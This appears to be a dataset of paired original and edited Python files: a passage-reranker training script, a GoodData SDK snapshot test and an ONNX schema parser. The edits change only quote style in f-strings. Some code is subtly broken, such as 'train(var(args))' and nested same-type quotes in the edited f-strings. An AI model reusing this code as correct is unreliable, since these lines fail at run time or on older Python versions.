edited_code stringlengths 17 978k | original_code stringlengths 17 978k |
|---|---|
import argparse
import logging
import os
import sys
import socket
import json
import pickle
import torch
from datetime import datetime
from transformers import AutoConfig, AutoTokenizer, AutoModel
from torch.utils.data import DataLoader, RandomSampler
from .framework import RerankerFramework
from ..datasets import (EfficientQARerankerDatasetForBaselineReranker_TRAIN,
EfficientQARerankerDatasetForBaselineReranker,
BaselineRerankerQueryBuilder)
from ..models import BaselineReranker
from ...common.utility.utility import setup_logging
LOGGER = logging.getLogger(__name__)
def build_parser():
parser = argparse.ArgumentParser(description='Passages Reranker training process.')
parser.add_argument("--config", default=None, help="")
parser.add_argument("--train", default="./data/train_wiki.jsonl", help="train dataset")
parser.add_argument("--val", default="./data/val_wiki.jsonl", help="validation dataset")
parser.add_argument("--database", default="./data/wiki.db", help="database with full passages")
parser.add_argument("--hard_negatives", default=None, help="")
parser.add_argument("--encoder", default="roberta-base", help="name or path to encoder")
parser.add_argument("--cache_dir", default=None, help="cache directory")
parser.add_argument("--max_length", default=512, type=int, help="maximum length of the input sequence")
parser.add_argument("--checkpoint_dir", default=".checkpoints", help="directory to saving checkpoints")
parser.add_argument("--no_gpu", action="store_true", help="no use GPU")
parser.add_argument("--train_batch_size", default=20, type=int, help="mini-batch size")
parser.add_argument("--eval_batch_size", default=100, type=int, help="mini-batch size")
parser.add_argument("--iter_size", default=8, type=int, help="accumulated gradient")
parser.add_argument("--num_epoch", default=5, type=int, help="number of epochs")
parser.add_argument("--lr", default=1, type=int, help="learning rate")
parser.add_argument("--fp16", action="store_true", help="train with fp16")
parser.add_argument("--criterion", default=None, help="loss function (CE/BCE)")
return parser
def binary_cross_entropy():
def inner(logits, target):
logits = logits.squeeze(0)
batch_size = logits.shape[0]
one_hots = torch.zeros(batch_size, device=target.get_device())
one_hots[target] = 1.
return criterion(logits, one_hots)
criterion = torch.nn.BCEWithLogitsLoss(reduction="sum")
return inner
def get_dataloader_for_baseline_reranker(dataset, random_sampler=False):
if random_sampler:
sampler = RandomSampler(dataset)
dataloader = DataLoader(
dataset,
sampler=sampler,
collate_fn=lambda batch: batch[0]
)
else:
dataloader = DataLoader(
dataset,
collate_fn=lambda batch: batch[0]
)
return dataloader
def train(args):
LOGGER.info("Config: " + json.dumps(args, sort_keys=True, indent=2))
config = AutoConfig.from_pretrained(args["encoder"], cache_dir=args["cache_dir"])
tokenizer = AutoTokenizer.from_pretrained(args["encoder"], cache_dir=args["cache_dir"], use_fast=False)
LOGGER.info("Load datasets.")
if args["hard_negatives"]:
with open(args["hard_negatives"], "rb") as file_:
negatives = pickle.load(file_)
else:
negatives = None
model_config = {
"reranker_model_type": "baseline",
"encoder": args["encoder"],
"encoder_config": config,
"max_length": args["max_length"],
"negatives": negatives != None
}
query_builder = BaselineRerankerQueryBuilder(tokenizer, args["max_length"])
train_dataset = EfficientQARerankerDatasetForBaselineReranker_TRAIN(args["train"], args["database"], tokenizer, query_builder, args["train_batch_size"], negative_samples=negatives, shuffle_predicted_indices=True)
val_dataset = EfficientQARerankerDatasetForBaselineReranker(args["val"], args["database"], query_builder, args["eval_batch_size"])
train_dataloader = get_dataloader_for_baseline_reranker(train_dataset, random_sampler=True)
val_dataloader = get_dataloader_for_baseline_reranker(val_dataset, random_sampler=False)
LOGGER.info("Reranker training configuration: " + json.dumps(args, indent=4, sort_keys=True))
LOGGER.info("Model inicialization.")
LOGGER.info(f"Cuda is available: {torch.cuda.is_available()}")
device = torch.device("cuda:0" if torch.cuda.is_available() and not args["no_gpu"] else "cpu")
framework = RerankerFramework(device, model_config, train_dataloader, val_dataloader)
encoder = AutoModel.from_pretrained(args["encoder"], cache_dir=args["cache_dir"])
model = BaselineReranker(config, encoder)
model = model.to(device)
save_ckpt = None
checkpoint_name = "reranker_"
checkpoint_name+= args["encoder"].split('/')[-1]
checkpoint_name+= "_" + datetime.today().strftime('%Y-%m-%d-%H-%M')
checkpoint_name+= "_" + socket.gethostname()
if args["checkpoint_dir"]:
if not os.path.isdir(args["checkpoint_dir"]):
os.mkdir(args["checkpoint_dir"])
save_ckpt = os.path.join(args["checkpoint_dir"], checkpoint_name)
LOGGER.info("Training started.")
if args["criterion"] == "CE":
LOGGER.info(f"Cross entropy is used.")
criterion = torch.nn.CrossEntropyLoss()
elif args["criterion"] == "BCE":
LOGGER.info(f"Binary cross entropy is used.")
checkpoint_name+= "_" + "BCE-loss"
criterion = binary_cross_entropy()
else:
LOGGER.warn(f'Unknown \'{args['criterion']}\' loss function. Default loss function is used.')
criterion = None
framework.train(model,
learning_rate=args["lr"],
batch_size=args["train_batch_size"],
iter_size=args["iter_size"],
num_epoch=args["num_epoch"],
save_ckpt=save_ckpt,
fp16=args["fp16"],
criterion=criterion)
LOGGER.info("Training completed.")
if __name__ == "__main__":
setup_logging(os.path.basename(sys.argv[0]).split(".")[0],
logpath=".logs/",
config_path="configurations/logging.yml")
parser = build_parser()
args = parser.parse_args()
if args.config:
if not os.path.exists(args.config):
LOGGER.error("Config file does not found.")
sys.exit(1)
with open(args.config) as file_:
jsons = json.load(file_)
args.__dict__.update(jsons)
train(var(args))
| import argparse
import logging
import os
import sys
import socket
import json
import pickle
import torch
from datetime import datetime
from transformers import AutoConfig, AutoTokenizer, AutoModel
from torch.utils.data import DataLoader, RandomSampler
from .framework import RerankerFramework
from ..datasets import (EfficientQARerankerDatasetForBaselineReranker_TRAIN,
EfficientQARerankerDatasetForBaselineReranker,
BaselineRerankerQueryBuilder)
from ..models import BaselineReranker
from ...common.utility.utility import setup_logging
LOGGER = logging.getLogger(__name__)
def build_parser():
parser = argparse.ArgumentParser(description='Passages Reranker training process.')
parser.add_argument("--config", default=None, help="")
parser.add_argument("--train", default="./data/train_wiki.jsonl", help="train dataset")
parser.add_argument("--val", default="./data/val_wiki.jsonl", help="validation dataset")
parser.add_argument("--database", default="./data/wiki.db", help="database with full passages")
parser.add_argument("--hard_negatives", default=None, help="")
parser.add_argument("--encoder", default="roberta-base", help="name or path to encoder")
parser.add_argument("--cache_dir", default=None, help="cache directory")
parser.add_argument("--max_length", default=512, type=int, help="maximum length of the input sequence")
parser.add_argument("--checkpoint_dir", default=".checkpoints", help="directory to saving checkpoints")
parser.add_argument("--no_gpu", action="store_true", help="no use GPU")
parser.add_argument("--train_batch_size", default=20, type=int, help="mini-batch size")
parser.add_argument("--eval_batch_size", default=100, type=int, help="mini-batch size")
parser.add_argument("--iter_size", default=8, type=int, help="accumulated gradient")
parser.add_argument("--num_epoch", default=5, type=int, help="number of epochs")
parser.add_argument("--lr", default=1, type=int, help="learning rate")
parser.add_argument("--fp16", action="store_true", help="train with fp16")
parser.add_argument("--criterion", default=None, help="loss function (CE/BCE)")
return parser
def binary_cross_entropy():
def inner(logits, target):
logits = logits.squeeze(0)
batch_size = logits.shape[0]
one_hots = torch.zeros(batch_size, device=target.get_device())
one_hots[target] = 1.
return criterion(logits, one_hots)
criterion = torch.nn.BCEWithLogitsLoss(reduction="sum")
return inner
def get_dataloader_for_baseline_reranker(dataset, random_sampler=False):
if random_sampler:
sampler = RandomSampler(dataset)
dataloader = DataLoader(
dataset,
sampler=sampler,
collate_fn=lambda batch: batch[0]
)
else:
dataloader = DataLoader(
dataset,
collate_fn=lambda batch: batch[0]
)
return dataloader
def train(args):
LOGGER.info("Config: " + json.dumps(args, sort_keys=True, indent=2))
config = AutoConfig.from_pretrained(args["encoder"], cache_dir=args["cache_dir"])
tokenizer = AutoTokenizer.from_pretrained(args["encoder"], cache_dir=args["cache_dir"], use_fast=False)
LOGGER.info("Load datasets.")
if args["hard_negatives"]:
with open(args["hard_negatives"], "rb") as file_:
negatives = pickle.load(file_)
else:
negatives = None
model_config = {
"reranker_model_type": "baseline",
"encoder": args["encoder"],
"encoder_config": config,
"max_length": args["max_length"],
"negatives": negatives != None
}
query_builder = BaselineRerankerQueryBuilder(tokenizer, args["max_length"])
train_dataset = EfficientQARerankerDatasetForBaselineReranker_TRAIN(args["train"], args["database"], tokenizer, query_builder, args["train_batch_size"], negative_samples=negatives, shuffle_predicted_indices=True)
val_dataset = EfficientQARerankerDatasetForBaselineReranker(args["val"], args["database"], query_builder, args["eval_batch_size"])
train_dataloader = get_dataloader_for_baseline_reranker(train_dataset, random_sampler=True)
val_dataloader = get_dataloader_for_baseline_reranker(val_dataset, random_sampler=False)
LOGGER.info("Reranker training configuration: " + json.dumps(args, indent=4, sort_keys=True))
LOGGER.info("Model inicialization.")
LOGGER.info(f"Cuda is available: {torch.cuda.is_available()}")
device = torch.device("cuda:0" if torch.cuda.is_available() and not args["no_gpu"] else "cpu")
framework = RerankerFramework(device, model_config, train_dataloader, val_dataloader)
encoder = AutoModel.from_pretrained(args["encoder"], cache_dir=args["cache_dir"])
model = BaselineReranker(config, encoder)
model = model.to(device)
save_ckpt = None
checkpoint_name = "reranker_"
checkpoint_name+= args["encoder"].split('/')[-1]
checkpoint_name+= "_" + datetime.today().strftime('%Y-%m-%d-%H-%M')
checkpoint_name+= "_" + socket.gethostname()
if args["checkpoint_dir"]:
if not os.path.isdir(args["checkpoint_dir"]):
os.mkdir(args["checkpoint_dir"])
save_ckpt = os.path.join(args["checkpoint_dir"], checkpoint_name)
LOGGER.info("Training started.")
if args["criterion"] == "CE":
LOGGER.info(f"Cross entropy is used.")
criterion = torch.nn.CrossEntropyLoss()
elif args["criterion"] == "BCE":
LOGGER.info(f"Binary cross entropy is used.")
checkpoint_name+= "_" + "BCE-loss"
criterion = binary_cross_entropy()
else:
LOGGER.warn(f'Unknown \'{args["criterion"]}\' loss function. Default loss function is used.')
criterion = None
framework.train(model,
learning_rate=args["lr"],
batch_size=args["train_batch_size"],
iter_size=args["iter_size"],
num_epoch=args["num_epoch"],
save_ckpt=save_ckpt,
fp16=args["fp16"],
criterion=criterion)
LOGGER.info("Training completed.")
if __name__ == "__main__":
setup_logging(os.path.basename(sys.argv[0]).split(".")[0],
logpath=".logs/",
config_path="configurations/logging.yml")
parser = build_parser()
args = parser.parse_args()
if args.config:
if not os.path.exists(args.config):
LOGGER.error("Config file does not found.")
sys.exit(1)
with open(args.config) as file_:
jsons = json.load(file_)
args.__dict__.update(jsons)
train(var(args))
|
# (C) 2021 GoodData Corporation
from __future__ import annotations
import json
import os
import pytest
from gooddata_sdk.compute.model.attribute import Attribute
from gooddata_sdk.compute.model.base import ObjId
from gooddata_sdk.compute.model.execution import compute_model_to_api_model
from gooddata_sdk.compute.model.filter import AbsoluteDateFilter, PositiveAttributeFilter
from gooddata_sdk.compute.model.metric import PopDate, PopDateDataset, PopDateMetric, PopDatesetMetric, SimpleMetric
_current_dir = os.path.dirname(os.path.abspath(__file__))
def _scenario_to_snapshot_name(scenario: str):
return f"{scenario.replace(" ", "_")}.snapshot.json"
_simple_metric = SimpleMetric(local_id="simple_metric_local_id", item=ObjId(type="metric", id="metric_id"))
_attribute = Attribute(local_id="attribute_local_id", label="label.id")
_pop_dataset_metric = PopDatesetMetric(
local_id="local_id1",
metric=_simple_metric,
date_datasets=[PopDateDataset(dataset=ObjId(type="dataset", id="dataset.id"), periods_ago=1)],
)
_pop_date_metric = PopDateMetric(
local_id="local_id1",
metric=_simple_metric,
date_attributes=[PopDate(attribute=ObjId(type="label", id="label.id"), periods_ago=1)],
)
_positive_filter = PositiveAttributeFilter(label=_attribute, values=["val1", "val2"])
_absolute_date_filter = AbsoluteDateFilter(
dataset=ObjId(type="dataset", id="dataset.id"),
from_date="2021-07-01 18:23",
to_date="2021-07-16 18:23",
)
test_inputs = [
[
"multiple attributes and metrics and filters",
[_attribute, Attribute(local_id="attribute_local_id2", label="label2.id")],
[_simple_metric, _pop_date_metric, _pop_dataset_metric],
[_positive_filter, _absolute_date_filter],
],
["attribute only", [_attribute], None, None],
["attribute and filter ", [_attribute], None, [_positive_filter]],
["metric only ", None, [_simple_metric], None],
["metric and filter ", None, [_simple_metric], [_positive_filter]],
[
"attribute and metric and filter ",
[_attribute],
[_simple_metric],
[_positive_filter],
],
]
@pytest.mark.parametrize("scenario,attributes,metrics,filters", test_inputs)
def test_attribute_filters_to_api_model(scenario, attributes, metrics, filters, snapshot):
# it is essential to define snapshot dir using absolute path, otherwise snapshots cannot be found when
# running in tox
snapshot.snapshot_dir = os.path.join(_current_dir, "afm")
afm = compute_model_to_api_model(attributes, metrics, filters)
snapshot.assert_match(
json.dumps(afm.to_dict(), indent=4, sort_keys=True),
_scenario_to_snapshot_name(scenario),
)
| # (C) 2021 GoodData Corporation
from __future__ import annotations
import json
import os
import pytest
from gooddata_sdk.compute.model.attribute import Attribute
from gooddata_sdk.compute.model.base import ObjId
from gooddata_sdk.compute.model.execution import compute_model_to_api_model
from gooddata_sdk.compute.model.filter import AbsoluteDateFilter, PositiveAttributeFilter
from gooddata_sdk.compute.model.metric import PopDate, PopDateDataset, PopDateMetric, PopDatesetMetric, SimpleMetric
_current_dir = os.path.dirname(os.path.abspath(__file__))
def _scenario_to_snapshot_name(scenario: str):
return f"{scenario.replace(' ', '_')}.snapshot.json"
_simple_metric = SimpleMetric(local_id="simple_metric_local_id", item=ObjId(type="metric", id="metric_id"))
_attribute = Attribute(local_id="attribute_local_id", label="label.id")
_pop_dataset_metric = PopDatesetMetric(
local_id="local_id1",
metric=_simple_metric,
date_datasets=[PopDateDataset(dataset=ObjId(type="dataset", id="dataset.id"), periods_ago=1)],
)
_pop_date_metric = PopDateMetric(
local_id="local_id1",
metric=_simple_metric,
date_attributes=[PopDate(attribute=ObjId(type="label", id="label.id"), periods_ago=1)],
)
_positive_filter = PositiveAttributeFilter(label=_attribute, values=["val1", "val2"])
_absolute_date_filter = AbsoluteDateFilter(
dataset=ObjId(type="dataset", id="dataset.id"),
from_date="2021-07-01 18:23",
to_date="2021-07-16 18:23",
)
test_inputs = [
[
"multiple attributes and metrics and filters",
[_attribute, Attribute(local_id="attribute_local_id2", label="label2.id")],
[_simple_metric, _pop_date_metric, _pop_dataset_metric],
[_positive_filter, _absolute_date_filter],
],
["attribute only", [_attribute], None, None],
["attribute and filter ", [_attribute], None, [_positive_filter]],
["metric only ", None, [_simple_metric], None],
["metric and filter ", None, [_simple_metric], [_positive_filter]],
[
"attribute and metric and filter ",
[_attribute],
[_simple_metric],
[_positive_filter],
],
]
@pytest.mark.parametrize("scenario,attributes,metrics,filters", test_inputs)
def test_attribute_filters_to_api_model(scenario, attributes, metrics, filters, snapshot):
# it is essential to define snapshot dir using absolute path, otherwise snapshots cannot be found when
# running in tox
snapshot.snapshot_dir = os.path.join(_current_dir, "afm")
afm = compute_model_to_api_model(attributes, metrics, filters)
snapshot.assert_match(
json.dumps(afm.to_dict(), indent=4, sort_keys=True),
_scenario_to_snapshot_name(scenario),
)
|
import re
import itertools
def format_text(prefix, start, texts):
output = []
curr = []
if start:
curr.append(start)
linebreaks = 0
for text in texts:
lines = []
length = len(prefix)
if start:
length += + len(start)
# split text into words by splitting on space and remove empty splits ("")
# then split on newline boundaries, but keep empty splits ("\n\n")
words = [w.split("\n") for w in text.strip().split(" ") if w != ""]
words = list(itertools.chain(*words))
for w in words:
if w.strip() == "":
if linebreaks == 0:
linebreaks += 1
continue
if linebreaks >= 2:
# we already did 2 line breaks, skip this one
continue
# empty split, caused by "\n\n", should cause single line break
linebreaks += 1
length = len(prefix)
lines.append(prefix + " ".join(curr))
curr = []
if start:
length += len(start)
curr.append(" "*len(start))
continue
else:
linebreaks = 0
if length + len(w) < 79:
# keep adding words
length += len(w) + 1
curr.append(w)
continue
# line is full, do line break
length = len(prefix) + len(w)
lines.append(prefix + " ".join(curr))
curr = []
if start:
length += len(start)
curr.append(" "*len(start))
curr.append(w)
lines.append(prefix + " ".join(curr))
curr = []
if start:
curr.append(" "*len(start))
output.append("\n".join(lines))
return "\n".join(output)
class OnnxType(dict):
_onnxTensorDataType = {
"float": "ONNX__TENSOR_PROTO__DATA_TYPE__FLOAT",
"uint8": "ONNX__TENSOR_PROTO__DATA_TYPE__UINT8",
"int8": "ONNX__TENSOR_PROTO__DATA_TYPE__INT8",
"uint16": "ONNX__TENSOR_PROTO__DATA_TYPE__UINT16",
"int16": "ONNX__TENSOR_PROTO__DATA_TYPE__INT16",
"int32": "ONNX__TENSOR_PROTO__DATA_TYPE__INT32",
"int64": "ONNX__TENSOR_PROTO__DATA_TYPE__INT64",
"string": "ONNX__TENSOR_PROTO__DATA_TYPE__STRING",
"bool": "ONNX__TENSOR_PROTO__DATA_TYPE__BOOL",
"float16": "ONNX__TENSOR_PROTO__DATA_TYPE__FLOAT16",
"double": "ONNX__TENSOR_PROTO__DATA_TYPE__DOUBLE",
"uint32": "ONNX__TENSOR_PROTO__DATA_TYPE__UINT32",
"uint64": "ONNX__TENSOR_PROTO__DATA_TYPE__UINT64",
"complex64": "ONNX__TENSOR_PROTO__DATA_TYPE__COMPLEX64",
"complex128": "ONNX__TENSOR_PROTO__DATA_TYPE__COMPLEX128",
"bfloat16": "ONNX__TENSOR_PROTO__DATA_TYPE__BFLOAT16",
}
class _Scanner:
_tokens = {
re.compile(r"tensor") : "tensor" ,
re.compile(r"map") : "map" ,
re.compile(r"seq") : "seq" ,
re.compile(r"\(") : "(" ,
re.compile(r"\)") : ")" ,
re.compile(r"float") : "float" ,
re.compile(r"uint8") : "uint8" ,
re.compile(r"int8") : "int8" ,
re.compile(r"uint16") : "uint16" ,
re.compile(r"int16") : "int16" ,
re.compile(r"int32") : "int32" ,
re.compile(r"int64") : "int64" ,
re.compile(r"string") : "string" ,
re.compile(r"bool") : "bool" ,
re.compile(r"float16") : "float16" ,
re.compile(r"double") : "double" ,
re.compile(r"uint32") : "uint32" ,
re.compile(r"uint64") : "uint64" ,
re.compile(r"complex64") : "complex64" ,
re.compile(r"complex128") : "complex128",
re.compile(r"bfloat16") : "bfloat16" ,
re.compile(r",") : "," ,
re.compile(r"\s+") : None ,
}
def __init__(self, string):
self.string = string
self.tokens = self.tokenize(string)
def tokenize(self, string):
pos = 0
tokens = []
while string[pos:]:
allMatches = map(lambda x: (x[0].match(string[pos:]), x[1]), self._tokens.items())
validMatches = filter(lambda x: x[0], allMatches)
try:
longestMatch = max( validMatches, key=lambda x: x[0].end())
except:
raise SyntaxError(f"no token matches: '{string[pos:]}'")
else:
pos += longestMatch[0].end()
if longestMatch[1]:
tokens.append(longestMatch[1])
return tokens
def consume(self, expected_token = None):
if not expected_token:
return self.pop()
if not self.peek(expected_token):
raise SyntaxError(
f"expected '{expected_token}', but got '{self.peek()}'")
return self.pop()
def peek(self, expected_token=None):
token = self.tokens[0]
if expected_token:
return token == expected_token
else:
return token
def pop(self):
return self.tokens.pop(0)
def onToken(self, token2function, consume=False):
for token, function in token2function.items():
if self.peek(token):
if consume:
self.pop()
return function()
tokens = ", ".join([f"'{t}'" for t in token2function.keys()])
raise SyntaxError(f"expected one of {tokens}, but got '{self.peek()}'")
def __repr__(self):
return f"OnnxType._Scanner({self.string.__repr__()})"
class _Parser:
_terminals = {
"float": lambda: "float",
"uint8": lambda: "uint8",
"int8": lambda: "int8",
"uint16": lambda: "uint16",
"int16": lambda: "int16",
"int32": lambda: "int32",
"int64": lambda: "int64",
"string": lambda: "string",
"bool": lambda: "bool",
"float16": lambda: "float16",
"double": lambda: "double",
"uint32": lambda: "uint32",
"uint64": lambda: "uint64",
"complex64": lambda: "complex64",
"complex128": lambda: "complex128",
"bfloat16": lambda: "bfloat16",
}
def __init__(self, scanner):
self.scanner = scanner
def __repr__(self):
return f"OnnxType._Parser({self.scanner.__repr__()})"
def _rule_tensor(self):
self.scanner.consume('(')
result = self.scanner.onToken(self._terminals, consume=True)
self.scanner.consume(')')
return {"tensor": result}
def _rule_map(self):
rules = {
"tensor": self._rule_tensor,
"map": self._rule_map,
"seq": self._rule_seq,
}
rules.update(self._terminals)
self.scanner.consume('(')
key = self.scanner.onToken(self._terminals, consume=True)
self.scanner.consume(',')
value = self.scanner.onToken(rules, consume=True)
self.scanner.consume(')')
return {"map": (key, value)}
def _rule_seq(self):
rules = {
"tensor": self._rule_tensor,
"map": self._rule_map,
"seq": self._rule_seq
}
rules.update(self._terminals)
self.scanner.consume('(')
result = self.scanner.onToken(rules, consume=True)
self.scanner.consume(')')
return {"seq": result}
def parse(self):
rules = {
"tensor": self._rule_tensor,
"map": self._rule_map,
"seq": self._rule_seq,
}
return self.scanner.onToken(rules, consume=True)
def __init__(self, typeStr):
super()
self.original = typeStr
scanner = self._Scanner(typeStr)
parser = self._Parser(scanner)
self.update(parser.parse())
def __str__(self):
return self._text_walkParseTree(self)
def __repr__(self):
return f"OnnxType({self.original.__repr__()})"
def _text_walkParseTree(self, node):
if isinstance(node,str):
return node.replace("_","")
elif isinstance(node,dict):
subresults = []
for key,val in node.items():
subresults.append(key + "_" + self._text_walkParseTree(val))
return "__".join(subresults)
elif isinstance(node,tuple):
return "__".join([ self._text_walkParseTree(t) for t in node ])
else:
raise BaseException(f"unknown parseTree item: '{node}'")
def onnxTensorDataTypes(self):
results = []
self._onnxTensorDataType_walkParseTree(self, results)
return list(filter(None,results))
def _onnxTensorDataType_walkParseTree(self, node, results):
if isinstance(node,str):
results.append(None)
elif isinstance(node,dict):
for key,val in node.items():
if key == "tensor":
results.append(self._onnxTensorDataType[val])
else:
self._onnxTensorDataType_walkParseTree(val,results)
elif isinstance(node,tuple):
for val in node:
self._onnxTensorDataType_walkParseTree(val, results)
else:
raise BaseException(f"unknown parseTree item: '{node}'")
def __hash__(self):
return self.original.__hash__()
class OnnxTypeList(list):
def __init__(self, typeList):
super()
types = []
types.extend(typeList)
types.sort()
self.extend([OnnxType(t) for t in types])
def __str__(self):
return ", ".join([f"{t}" for t in self])
def __repr__(self):
types = ", ".join([t.original.__repr__() for t in self])
return f"OnnxTypeList([{types}])"
class OnnxConstraint():
def __init__(self, constraint, input=False, output=False):
if isinstance(constraint, dict):
self.types = constraint['types']
self.description = constraint['description']
self.name = constraint['name']
self.input = constraint['input']
self.output = constraint['output']
else:
self.types = OnnxTypeList(constraint.allowed_type_strs)
self.description = constraint.description
self.name = constraint.type_param_str
self.input = input
self.output = output
def text(self, prefix=""):
lines = []
lines.append(f"{prefix}Constraint {self.name}:")
lines.append(format_text(prefix + " ", "", [self.description]))
lines.append(format_text(prefix + " ", "Allowed Types:", [str(self.types)] ))
return "\n".join(lines)
def __repr__(self):
return f"OnnxConstraint({self.__dict__.__repr__()})"
class OnnxConstraints(dict):
def __init__(self, schema):
super()
constraints = {c.type_param_str for c in schema.type_constraints}
inputs = {i.typeStr for i in schema.inputs if i.typeStr in constraints}
outputs = {o.typeStr for o in schema.outputs if o.typeStr in constraints}
for constraint in schema.type_constraints:
self[constraint.type_param_str] = OnnxConstraint(constraint, input=constraint.type_param_str in inputs, output=constraint.type_param_str in outputs)
def typePermutations(self, filterInput=False, filterOutput=False):
return list(filter(None,(self.typePermutationText(p) for p in self.typePermutationsTuple(filterInput,filterOutput))))
def typePermutationText(self, permutation):
return "__".join([ f"{x[0]}_{x[1]}" for x in permutation ])
def typePermutationsTuple(self, filterInput=False, filterOutput=False):
# a implies b is the same as bool(a) ** bool(b)
values = filter(lambda x: (x.input ** filterInput) and (x.output ** filterOutput), self.values())
tuples = [list(map(lambda x: (c.name,x), c.types)) for c in values]
return itertools.product(*tuples)
def typePermutationsMap(self, filterInput=False, filterOutput=False):
result = {}
for permutation in self.typePermutationsTuple(filterInput, filterOutput):
tmp = result
constraints = []
for constraint in permutation:
constraints.append(constraint)
tmp = tmp.setdefault(tuple(constraints), {})
return result
def text(self, prefix=""):
paragraphs = [ c.text(prefix) for c in self.values() ]
return f"\n{prefix}\n".join(paragraphs)
def __str__(self):
return self.text()
class OnnxAttribute():
_onnxAttributeDataType = {
"UNDEFINED" : "ONNX__ATTRIBUTE_PROTO__ATTRIBUTE_TYPE__UNDEFINED",
"FLOAT" : "ONNX__ATTRIBUTE_PROTO__ATTRIBUTE_TYPE__FLOAT",
"INT" : "ONNX__ATTRIBUTE_PROTO__ATTRIBUTE_TYPE__INT",
"STRING" : "ONNX__ATTRIBUTE_PROTO__ATTRIBUTE_TYPE__STRING",
"TENSOR" : "ONNX__ATTRIBUTE_PROTO__ATTRIBUTE_TYPE__TENSOR",
"GRAPH" : "ONNX__ATTRIBUTE_PROTO__ATTRIBUTE_TYPE__GRAPH",
"SPARSE_TENSOR" : "ONNX__ATTRIBUTE_PROTO__ATTRIBUTE_TYPE__SPARSE_TENSOR",
"FLOATS" : "ONNX__ATTRIBUTE_PROTO__ATTRIBUTE_TYPE__FLOATS",
"INTS" : "ONNX__ATTRIBUTE_PROTO__ATTRIBUTE_TYPE__INTS",
"STRINGS" : "ONNX__ATTRIBUTE_PROTO__ATTRIBUTE_TYPE__STRINGS",
"TENSORS" : "ONNX__ATTRIBUTE_PROTO__ATTRIBUTE_TYPE__TENSORS",
"GRAPHS" : "ONNX__ATTRIBUTE_PROTO__ATTRIBUTE_TYPE__GRAPHS",
"SPARSE_TENSORS" : "ONNX__ATTRIBUTE_PROTO__ATTRIBUTE_TYPE__SPARSE_TENSORS",
}
def __init__(self, name, attribute):
self.name = name
if isinstance(attribute, dict):
self.optional = attribute['optional']
self.type = attribute['type']
self.description = attribute['description']
else:
self.optional = attribute.required
self.type = attribute.type.name
self.description = attribute.description
def text(self, prefix=""):
lines = []
lines.append(f"{prefix}Attribute {self.type} {self.name} {"(optional)"*self.optional}:")
lines.append(format_text(prefix + " ", None, [self.description]))
return "\n".join(lines)
def onnxAttributeDataType(self):
return self._onnxAttributeDataType[self.type]
def __repr__(self):
attribute = self.__dict__.copy()
del attribute['name']
return f"OnnxAttribute({self.name.__repr__()}, {attribute.__repr__()})"
def __str__(self):
return self.text()
class OnnxAttributeList(list):
def __init__(self, schema):
super()
for name,attribute in schema.attributes.items():
self.append(OnnxAttribute(name, attribute))
def text(self, prefix=""):
paragraphs = [ a.text(prefix) for a in self ]
return f"\n{prefix}\n".join(paragraphs)
def __str__(self):
return self.text()
class OnnxInput():
def __init__(self, input):
if isinstance(input, dict):
self.name = input['name']
self.description = input['description']
self.isHomogeneous = input['isHomogeneous']
self.optional = input['optional']
self.variadic = input['variadic']
self.constraint = input['constraint']
self.types = input['types']
else:
self.name = input.name
self.description = input.description.strip()
self.isHomogeneous = input.isHomogeneous
self.optional = (input.option.name == "Optional")
self.variadic = (input.option.name == "Variadic")
self.constraint = input.typeStr
self.types = OnnxTypeList(input.types)
def text(self, prefix=""):
lines = []
lines.append(f"{prefix}Input {self.constraint} {self.name}:")
lines.append(format_text(prefix + " ", "", [self.description]))
lines.append(format_text(prefix + " ", "Allowed Types:", [str(self.types)] ))
return "\n".join(lines)
def __repr__(self):
return f"OnnxInput({self.__dict__.__repr__()})"
def __str__(self):
return self.text()
class OnnxInputList(list):
def __init__(self, schema):
super()
self.extend([ OnnxInput(i) for i in schema.inputs])
def text(self, prefix=""):
paragraphs = [ i.text(prefix) for i in self ]
return f"\n{prefix}\n".join(paragraphs)
def __str__(self):
return self.text()
class OnnxOutput():
def __init__(self, output):
if isinstance(output, dict):
self.name = output['name']
self.description = output['description']
self.isHomogeneous = output['isHomogeneous']
self.optional = output['optional']
self.variadic = output['variadic']
self.constraint = output['constraint']
self.types = output['types']
else:
self.name = output.name
self.description = output.description
self.isHomogeneous = output.isHomogeneous
self.optional = (output.option.name == "Optional")
self.variadic = (output.option.name == "Variadic")
self.constraint = output.typeStr
self.types = OnnxTypeList(output.types)
def text(self, prefix=""):
lines = []
lines.append(f"{prefix}Output {self.constraint} {self.name}:")
lines.append(format_text(prefix + " ", None, [self.description]))
lines.append(format_text(prefix + " ", "Allowed Types:", [str(self.types)] ))
return "\n".join(lines)
def __repr__(self):
return self.__dict__.__repr__()
def __str__(self):
return self.text()
class OnnxOutputList(list):
def __init__(self, schema):
super()
self.extend([ OnnxOutput(i) for i in schema.outputs])
def text(self, prefix=""):
paragraphs = [ i.text(prefix) for i in self ]
return f"\n{prefix}\n".join(paragraphs)
def __str__(self):
return self.text()
class OnnxDoc():
def __init__(self, schema):
if isinstance(schema,str):
self.doc = schema
else:
self.doc = schema.doc.strip()
def __repr__(self):
return f"OnnxDoc({self.doc.__repr__()})"
def text(self, prefix=" * "):
return prefix + f"\n{prefix}".join(self.doc.split('\n'))
def __str__(self):
return self.text()
class OnnxSchema():
def __init__(self, schema):
self.name = None
self.doc = None
self.deprecated = None
self.operator_name = None
self.version = None
self.domain = None
self.constraints = None
self.attributes = None
self.inputs = None
self.outputs = None
self.ref_doc = None
self.range_input = None
self.range_output = None
self.ref_file = None
self._schema = None
if isinstance(schema, dict):
self.__dict__.update(schema)
else:
self.doc = OnnxDoc(schema)
self.name = schema.name
self.deprecated = schema.deprecated
self.operator_name = self._operator_name(schema)
self.version = schema.since_version
self.domain = self._domain(schema)
self.constraints = OnnxConstraints(schema)
self.attributes = OnnxAttributeList(schema)
self.inputs = OnnxInputList(schema)
self.outputs = OnnxOutputList(schema)
self.ref_doc = self._ref_doc(schema)
self.range_input = (schema.min_input, schema.max_input)
self.range_output = (schema.min_output, schema.max_output)
self.ref_file = (schema.file,schema.line)
self._schema = schema
def __repr__(self):
return f"OnnxSchema({self.__dict__.__repr__()})"
def _operator_name(self, schema):
name = f"operator__{self._domain(schema)}__{schema.name}__{schema.since_version}"
return re.sub(r"\W", "_", name).lower()
def _domain(self, schema):
domain = "onnx"
if schema.domain:
domain = schema.domain
return domain.strip()
def _ref_doc(self, schema):
domain = self._domain(schema)
if domain == 'onnx':
return f"https://github.com/onnx/onnx/blob/master/docs/Operators.md#{schema.name}"
elif domain == 'ai.onnx.ml':
return f"https://github.com/onnx/onnx/blob/master/docs/Operators-ml.md#{schema.name}"
else:
return '' | import re
import itertools
def format_text(prefix, start, texts):
output = []
curr = []
if start:
curr.append(start)
